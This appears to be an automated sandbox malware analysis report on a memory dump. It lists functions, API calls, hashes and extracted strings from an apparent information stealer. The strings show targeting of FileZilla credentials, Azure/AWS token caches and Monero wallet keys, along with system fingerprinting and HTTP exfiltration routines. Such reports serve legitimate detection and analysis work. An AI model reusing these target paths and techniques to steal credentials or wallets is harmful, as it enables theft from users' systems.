                                    control_flow_graph 915 30548d0-3054992 call 306a170 call 3054800 call 306a110 * 5 932 3054994 915->932 933 305499b-305499f 915->933 932->933 934 30549a5-3054b1d call 3068600 call 306a2f0 call 306a270 call 306a1d0 * 2 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a2f0 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a2f0 call 306a270 call 306a1d0 * 2 933->934 935 3054f1b-3054f43 call 306a4a0 call 3059b10 933->935 934->935 1023 3054b23-3054b27 934->1023 948 3054f45-3054f7d call 306a1f0 call 306a380 call 306a270 call 306a1d0 935->948 949 3054f82-3054ff2 call 3068430 * 2 call 306a170 call 306a1d0 * 8 935->949 948->949 1024 3054b35 1023->1024 1025 3054b29-3054b33 1023->1025 1026 3054b3f-3054b72 1024->1026 1025->1026 1028 3054f0e-3054f14 1026->1028 1029 3054b78-3054e78 call 306a380 call 306a270 call 306a1d0 call 306a2f0 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a2f0 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a2f0 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a380 call 306a270 call 306a1d0 call 306a2f0 call 306a270 call 306a1d0 call 306a110 call 306a2f0 * 2 call 306a270 call 306a1d0 * 2 call 306a4a0 * 4 1026->1029 1028->935 1143 3054e82-3054eac 1029->1143 1145 3054eb7-3054f09 InternetCloseHandle call 306a1d0 1143->1145 1146 3054eae-3054eb5 1143->1146 1145->1028 1146->1145 1147 3054eb9-3054ef7 call 306a380 call 306a270 call 306a1d0 1146->1147 1147->1143
                                    APIs
                                      • Part of subcall function 03054800: ??_U@YAPAXI@Z.MSVCRT ref: 0305483A
                                      • Part of subcall function 03054800: ??_U@YAPAXI@Z.MSVCRT ref: 03054851
                                      • Part of subcall function 03054800: ??2@YAPAXI@Z.MSVCRT ref: 03054868
                                      • Part of subcall function 03054800: InternetCrackUrlA.WININET(00000000,00000000), ref: 03054899
                                    • InternetCloseHandle.WININET(00000000), ref: 03054EFD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: Internet$??2@CloseCrackHandle
                                    • String ID: "$"$------$------$------
                                    • API String ID: 598685214-2180234286
                                    • Opcode ID: f807dd7df8049e3c5b3b935a4c754dee539c1927fa8439b0408a3176331a0d6e
                                    • Instruction ID: ca6b4cac20adf6fff8ec772a6c3f30579e4482045546e7118e21204cc3060913
                                    • Opcode Fuzzy Hash: f807dd7df8049e3c5b3b935a4c754dee539c1927fa8439b0408a3176331a0d6e
                                    • Instruction Fuzzy Hash: 66120BB5A52218AACB14FBA4DC91FEEB378BF94300F104199A5077A094EF706F48CF65
                                    Function 03054800 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • ??_U@YAPAXI@Z.MSVCRT ref: 0305483A
                                    • ??_U@YAPAXI@Z.MSVCRT ref: 03054851
                                    • ??2@YAPAXI@Z.MSVCRT ref: 03054868
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 03054899
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: ??2@CrackInternet
                                    • String ID: <
                                    • API String ID: 836262421-4251816714
                                    • Opcode ID: cfa1d009220bc10682f44f671dc97a2ac528e0a093132d879a000d54544f6e2e
                                    • Instruction ID: 6f8f679f5442c04b51461bb5ea5a05d37cc3e0d452c5b7b91c67d661fcd6f849
                                    • Opcode Fuzzy Hash: cfa1d009220bc10682f44f671dc97a2ac528e0a093132d879a000d54544f6e2e
                                    • Instruction Fuzzy Hash: 9B21FCB5D01208ABDF14EFA4E849BDE7B75FF44320F108225F925AB284EB706A05CF91
                                    Function 03069270 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 212libraryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1384 3069270-3069284 call 3069160 1387 30694a3-3069502 LoadLibraryA * 3 1384->1387 1388 306928a-306949e call 3069190 1384->1388 1394 3069504-3069518 1387->1394 1395 306951d-3069524 1387->1395 1388->1387 1394->1395 1396 3069556-306955d 1395->1396 1397 3069526-3069551 1395->1397 1399 306955f-3069573 1396->1399 1400 3069578-306957f 1396->1400 1397->1396 1399->1400 1404 3069581-3069594 1400->1404 1405 3069599-30695a0 1400->1405 1404->1405 1407 30695a2-30695cc 1405->1407 1408 30695d1-30695d2 1405->1408 1407->1408
                                    APIs
                                    • LoadLibraryA.KERNELBASE(?,?,030664A0), ref: 030694AA
                                    • LoadLibraryA.KERNELBASE(?,?,030664A0), ref: 030694BB
                                    • LoadLibraryA.KERNELBASE(?,?,030664A0), ref: 030694DF
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 030695BA
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 1029625771-2781105232
                                    • Opcode ID: 2ffa1d1df9884add14a8801071ef3a26590db6802dd1a110569fc1cd03fd946f
                                    • Instruction ID: 837f84f9a273dff9aaf112c5379ae3c4fdf79d5fb4c7e0aa550097c782974a6a
                                    • Opcode Fuzzy Hash: 2ffa1d1df9884add14a8801071ef3a26590db6802dd1a110569fc1cd03fd946f
                                    • Instruction Fuzzy Hash: 3DA12ABA511220EFC744FFB9F89CE1A3BA9BB8C741750D51AE50AC324CD734A442DB69
                                    Function 030612B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 160stringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1431 30612b0-30612dd call 306a4a0 1435 30612e7-3061301 call 306a4a0 strtok_s 1431->1435 1436 30612df-30612e1 ExitProcess 1431->1436 1439 3061304-3061308 1435->1439 1440 30614d2-30614dd call 306a1d0 1439->1440 1441 306130e-3061321 1439->1441 1442 3061327-306132a 1441->1442 1443 30614ae-30614cd strtok_s 1441->1443 1445 3061345-3061354 call 306a1f0 1442->1445 1446 3061442-3061453 1442->1446 1447 3061423-3061434 1442->1447 1448 3061480-3061491 1442->1448 1449 3061401-3061412 1442->1449 1450 3061461-3061472 1442->1450 1451 306138f-30613a0 1442->1451 1452 306136d-306137e 1442->1452 1453 3061331-3061340 call 306a1f0 1442->1453 1454 30613df-30613f0 1442->1454 1455 306149f-30614a9 call 306a1f0 1442->1455 1456 30613bd-30613ce 1442->1456 1457 3061359-3061368 call 306a1f0 1442->1457 1443->1439 1445->1443 1489 3061455-3061458 1446->1489 1490 306145f 1446->1490 1487 3061436-3061439 1447->1487 1488 3061440 1447->1488 1479 3061493-3061496 1448->1479 1480 306149d 1448->1480 1485 3061414-3061417 1449->1485 1486 306141e 1449->1486 1475 3061474-3061477 1450->1475 1476 306147e 1450->1476 1477 30613a2-30613ac 1451->1477 1478 30613ae-30613b1 1451->1478 1491 3061380-3061383 1452->1491 1492 306138a 1452->1492 1453->1443 1483 30613f2-30613f5 1454->1483 1484 30613fc 1454->1484 1455->1443 1481 30613d0-30613d3 1456->1481 1482 30613da 1456->1482 1457->1443 1475->1476 1476->1443 1493 30613b8 1477->1493 1478->1493 1479->1480 1480->1443 1481->1482 1482->1443 1483->1484 1484->1443 1485->1486 1486->1443 1487->1488 1488->1443 1489->1490 1490->1443 1491->1492 1492->1443 1493->1443
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: strtok_s$ExitProcess
                                    • String ID: block
                                    • API String ID: 762877946-2199623458
                                    • Opcode ID: 176b30c82a03617a58eaa8d2e73b7053c04d84773877123de9a069d21572aa33
                                    • Instruction ID: 0d09ef97371a8a25478664452b2190ee562476c1650b17322c39e2293206982c
                                    • Opcode Fuzzy Hash: 176b30c82a03617a58eaa8d2e73b7053c04d84773877123de9a069d21572aa33
                                    • Instruction Fuzzy Hash: 525171B4F01209EFCB08EFA4D988AAE77B9BF84704F048548E416BB748D770E955CB65
                                    Function 03066FA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1494 3066fa0-3066fea 1496 3066ff3-3067067 GetVolumeInformationA call 30687a0 * 3 1494->1496 1497 3066fec 1494->1497 1504 3067078-306707f 1496->1504 1497->1496 1505 3067081-306709a call 30687a0 1504->1505 1506 306709c-30670b7 1504->1506 1505->1504 1512 30670c8-30670f8 call 306a110 1506->1512 1513 30670b9-30670c6 call 306a110 1506->1513 1517 306711e-306712e 1512->1517 1513->1517
                                    APIs
                                    • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0306701F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: InformationVolume
                                    • String ID: :$C$\
                                    • API String ID: 2039140958-3809124531
                                    • Opcode ID: d961c6be5eb35409846a61746f3a49c87bd930520e9637a5229e53a30fdc22c1
                                    • Instruction ID: 7c472d100c59179c3a6c2c2a96810521120a31ed5c6b046108badda73c34ffd3
                                    • Opcode Fuzzy Hash: d961c6be5eb35409846a61746f3a49c87bd930520e9637a5229e53a30fdc22c1
                                    • Instruction Fuzzy Hash: E841E3B1D01358EBDB10DFA4DC45BEEBBB8BF48704F004499E6096B284D774AA44CBA1
                                    Function 03051220 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1520 3051220-3051247 call 3068450 GlobalMemoryStatusEx 1523 3051273-305127a 1520->1523 1524 3051249-3051271 call 306d3f0 * 2 1520->1524 1525 3051281-3051285 1523->1525 1524->1525 1528 3051287 1525->1528 1529 305129a-305129d 1525->1529 1531 3051292 1528->1531 1532 3051289-3051290 1528->1532 1531->1529 1532->1529 1532->1531
                                    APIs
                                    • GlobalMemoryStatusEx.KERNELBASE(00000040,?,00000000,00000040), ref: 0305123E
                                    • __aulldiv.LIBCMT ref: 03051258
                                    • __aulldiv.LIBCMT ref: 03051266
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: __aulldiv$GlobalMemoryStatus
                                    • String ID: @
                                    • API String ID: 2185283323-2766056989
                                    • Opcode ID: 440e03f50bfcd08494e8d4554477329139ef672bdce631997b523649752e051c
                                    • Instruction ID: d56b57c806fee6dcf44e8c1b0a942b1b3bca39784bc0e8cf7ab18cc661476dea
                                    • Opcode Fuzzy Hash: 440e03f50bfcd08494e8d4554477329139ef672bdce631997b523649752e051c
                                    • Instruction Fuzzy Hash: A90169B0E41308BBEF14EBE8DC49B9EBBB8EB44705F248049FA04BA1C4C7B455818B59
                                    Function 03066490 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 03051160: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,030664B7,03070ADA), ref: 0305116A
                                      • Part of subcall function 03051110: VirtualAllocExNuma.KERNELBASE(00000000,?,?,030664BC), ref: 03051132
                                      • Part of subcall function 03051220: GlobalMemoryStatusEx.KERNELBASE(00000040,?,00000000,00000040), ref: 0305123E
                                      • Part of subcall function 03051220: __aulldiv.LIBCMT ref: 03051258
                                      • Part of subcall function 03051220: __aulldiv.LIBCMT ref: 03051266
                                    • GetUserDefaultLangID.KERNELBASE ref: 030664C6
                                      • Part of subcall function 030672F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0306733F
                                      • Part of subcall function 03067380: GetComputerNameA.KERNEL32(?,00000104), ref: 030673CF
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: NameUser__aulldiv$AllocComputerDefaultGlobalInfoLangMemoryNumaStatusSystemVirtual
                                    • String ID:
                                    • API String ID: 736289943-0
                                    • Opcode ID: 79cb33cb373ffac37eeeabe458c5481abbe9bde5a01ab82240d39c1aca9d85bc
                                    • Instruction ID: 1216239573743fdbaa1f8eb932a9b199bff4ceb5e15c5abfad09b480b2c52ecd
                                    • Opcode Fuzzy Hash: 79cb33cb373ffac37eeeabe458c5481abbe9bde5a01ab82240d39c1aca9d85bc
                                    • Instruction Fuzzy Hash: F0311CB9A42319AACB08FBF4DC55BEE7778AFC4200F004518F9137E188DFB5660586A5
                                    Function 03067380 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 030673CF
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: ComputerName
                                    • String ID:
                                    • API String ID: 3545744682-0
                                    • Opcode ID: bf0d592154634232367bba2a437b1a34c2a9d2ffeca332c0ed7840ba31e3e67f
                                    • Instruction ID: cd846028d7d021ffb1e97c0dc48b7863d26dda147c8d39e6f12562aadba157da
                                    • Opcode Fuzzy Hash: bf0d592154634232367bba2a437b1a34c2a9d2ffeca332c0ed7840ba31e3e67f
                                    • Instruction Fuzzy Hash: 750181B1A05209EBC700DF99D949BAEBBB8FB04B25F10061AFA05E3684D7745904CBA1
                                    Function 03051110 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAllocExNuma.KERNELBASE(00000000,?,?,030664BC), ref: 03051132
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: AllocNumaVirtual
                                    • String ID:
                                    • API String ID: 4233825816-0
                                    • Opcode ID: 55c7c5d1951f1bfc914de74525452d782f670cafc40c070afa323db306e51cce
                                    • Instruction ID: 657586e3985d3d6c52d9155fcf6e95dc09021ff0f95241da7d470b55e898f3d2
                                    • Opcode Fuzzy Hash: 55c7c5d1951f1bfc914de74525452d782f670cafc40c070afa323db306e51cce
                                    • Instruction Fuzzy Hash: BAE0E670945308FBEB54ABA1AC0EB49766CAF04B05F109195FA0DBA1C4C6F525009A59
                                    Function 030510A0 Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,17C841C0,00003000,00000004,?,?,?,0305114E,?,?,030664BC), ref: 030510B3
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 16f7c8b072293730e9d1dfc116cbc40138ccf5ba5a1b89d09488579310a5472a
                                    • Instruction ID: c21db5efb9e9cd9829b3c5ac364a7454420a31011efe9a2fbcfc89b2a9c840c7
                                    • Opcode Fuzzy Hash: 16f7c8b072293730e9d1dfc116cbc40138ccf5ba5a1b89d09488579310a5472a
                                    • Instruction Fuzzy Hash: 0FF0E272642218BBEB14EAA5AC49FABF7D8A705B04F305548F900E7280D571AE008AA0

                                    Non-executed Functions

                                    Function 0306ACFA Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0306B562
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0306B577
                                    • UnhandledExceptionFilter.KERNEL32(0306F298), ref: 0306B582
                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0306B59E
                                    • TerminateProcess.KERNEL32(00000000), ref: 0306B5A5
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                    • String ID:
                                    • API String ID: 2579439406-0
                                    • Opcode ID: fcf7ef436a2aa4c7d0be2b0e9ac18ca4c9b98e3fee7739398ebec5b79f67f39b
                                    • Instruction ID: 903faf791e6ce3be03a3a91fdce7c67fcaddbe4d8d2b6796fbde76a4a9173f83
                                    • Opcode Fuzzy Hash: fcf7ef436a2aa4c7d0be2b0e9ac18ca4c9b98e3fee7739398ebec5b79f67f39b
                                    • Instruction Fuzzy Hash: EF21DFB8D03344DFE710FF69E288A643BA4BB48314F50405AE50AFBA4DE7B85984CF55
                                    Function 0306C8D9 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001C897), ref: 0306C8DE
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 90b039a6e4bdb55adf563ae20f8c0bf2fadb024ef6e8210c84f13aaad122804a
                                    • Instruction ID: e087a4bc5d83fb0ab1484af33c9eb8008bfce003376d153537b0d579427406a8
                                    • Opcode Fuzzy Hash: 90b039a6e4bdb55adf563ae20f8c0bf2fadb024ef6e8210c84f13aaad122804a
                                    • Instruction Fuzzy Hash: 9D9002A8253604DFB620A7749A0941D29D05A885127451850B155C804DEA6840849561
                                    Function 03069160 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    Function 03060090 Relevance: 23.1, APIs: 3, Strings: 10, Instructions: 363stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • strtok_s.MSVCRT ref: 0306015B
                                    • memset.MSVCRT ref: 0306051D
                                      • Part of subcall function 03068380: malloc.MSVCRT ref: 03068388
                                      • Part of subcall function 03068380: strncpy.MSVCRT ref: 030683A3
                                    • strtok_s.MSVCRT ref: 030604B9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: strtok_s$mallocmemsetstrncpy
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 2676359353-555421843
                                    • Opcode ID: 9a912b0b8c1eb2ab8423b07e30ccad0bfb4588647e264f766ce42653d8061360
                                    • Instruction ID: 183a345721713e7746afe02885bdaeef6e82231da7e48e39eb8126716ac267da
                                    • Opcode Fuzzy Hash: 9a912b0b8c1eb2ab8423b07e30ccad0bfb4588647e264f766ce42653d8061360
                                    • Instruction Fuzzy Hash: 39D11FB5E41208ABCB04FBF4DC59EEE7778BF94300F508518F502BA189EA74AA45CB65
                                    Function 03064850 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 119COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: memset
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 2221118986-974132213
                                    • Opcode ID: 0d7d3271e5f177cf669a036326fc7005e3e54c5dddec308fbdc8b52c04b00c65
                                    • Instruction ID: 3e5765b4fdaa50ecd3c6e8422d75c96e3dabfa2cea3852ab88f4dc1f452b4e03
                                    • Opcode Fuzzy Hash: 0d7d3271e5f177cf669a036326fc7005e3e54c5dddec308fbdc8b52c04b00c65
                                    • Instruction Fuzzy Hash: 2141D6BDE42304ABCB14FB60EC4AFDD773C9F94700F408554B649AA085EEB467898B95
                                    Function 030559B0 Relevance: 11.0, APIs: 2, Strings: 5, Instructions: 493COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 03054800: ??_U@YAPAXI@Z.MSVCRT ref: 0305483A
                                      • Part of subcall function 03054800: ??_U@YAPAXI@Z.MSVCRT ref: 03054851
                                      • Part of subcall function 03054800: ??2@YAPAXI@Z.MSVCRT ref: 03054868
                                      • Part of subcall function 03054800: InternetCrackUrlA.WININET(00000000,00000000), ref: 03054899
                                    • memcpy.MSVCRT ref: 03055F16
                                    • memcpy.MSVCRT ref: 03055F4E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: memcpy$??2@CrackInternet
                                    • String ID: "$"$------$------$------
                                    • API String ID: 2992602757-2180234286
                                    • Opcode ID: 7781a3466355eb33b026095158d4d0cd3e861f4838427e863bcf0ed935a6bcdd
                                    • Instruction ID: 672b60fc96e370456c7e830eaddbcda2f558eaed67304c21dca42da4ab7755be
                                    • Opcode Fuzzy Hash: 7781a3466355eb33b026095158d4d0cd3e861f4838427e863bcf0ed935a6bcdd
                                    • Instruction Fuzzy Hash: 7A121EB5962228ABCB14FBA4DC94FEEB378BF94700F404199B5077A094DF716B48CB64
                                    Function 030633C0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 250COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 0-2524465048
                                    • Opcode ID: 0b0355dc1b839e8babd2d0bb1bf81017348c2fb3d56cda18870a90095a9a679d
                                    • Instruction ID: 54f65e4aefd58bed6465f90c47cb03ff9a6001769afaa5de7fb8d6aecf6b5750
                                    • Opcode Fuzzy Hash: 0b0355dc1b839e8babd2d0bb1bf81017348c2fb3d56cda18870a90095a9a679d
                                    • Instruction Fuzzy Hash: F8A142B5A013189BDB64EFA4DC89FEE7379BF88300F048598E50D9A144DB749B84CFA1
                                    Function 03066B70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 136COMMON
                                    Download Yara Rule
                                    APIs
                                    • ??_U@YAPAXI@Z.MSVCRT ref: 03066B7E
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,03066DAD,030705AD), ref: 03066BBC
                                    • memset.MSVCRT ref: 03066C0A
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 03066D5E
                                    Strings
                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 03066C2C
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: OpenProcessmemset
                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                    • API String ID: 1606381396-4138519520
                                    • Opcode ID: badaefe7f70b41c08da54284fb7f3e2e570b0146d048826e35e37adaa618e7f3
                                    • Instruction ID: 111cf73f84d6b732917026db8424ec754b1e60b35a9a05c6c425540fd85a7a0a
                                    • Opcode Fuzzy Hash: badaefe7f70b41c08da54284fb7f3e2e570b0146d048826e35e37adaa618e7f3
                                    • Instruction Fuzzy Hash: 975181B4D0131C9FDB54EF94DC84BEEB7B4AF84304F5441A8E2057A189EB756A84CF58
                                    Function 03051310 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 139COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: memset
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 2221118986-218353709
                                    • Opcode ID: 069b18e6c1907183ea14fef4452b756e675ab9d467fe8efe346e14701e1b0c7c
                                    • Instruction ID: bdbb2e89dd3c90ac5edacf27ada9f957635344e23fe3bba390cc6db2f5b4e040
                                    • Opcode Fuzzy Hash: 069b18e6c1907183ea14fef4452b756e675ab9d467fe8efe346e14701e1b0c7c
                                    • Instruction Fuzzy Hash: D15152B5E512199BCB14FB64DC95FED733CAF94200F404198B60A7A085EF706B89CFA9
                                    Function 03064DA0 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 138stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 030562D0: InternetOpenA.WININET(03070DE6,00000001,00000000,00000000,00000000,03070DE3), ref: 03056331
                                      • Part of subcall function 030562D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 03056385
                                      • Part of subcall function 030562D0: HttpOpenRequestA.WININET(00000000,GET,?,?,00000000,00000000,00400100,00000000), ref: 030563D5
                                      • Part of subcall function 030562D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 03056421
                                    • strtok.MSVCRT ref: 03064E7E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
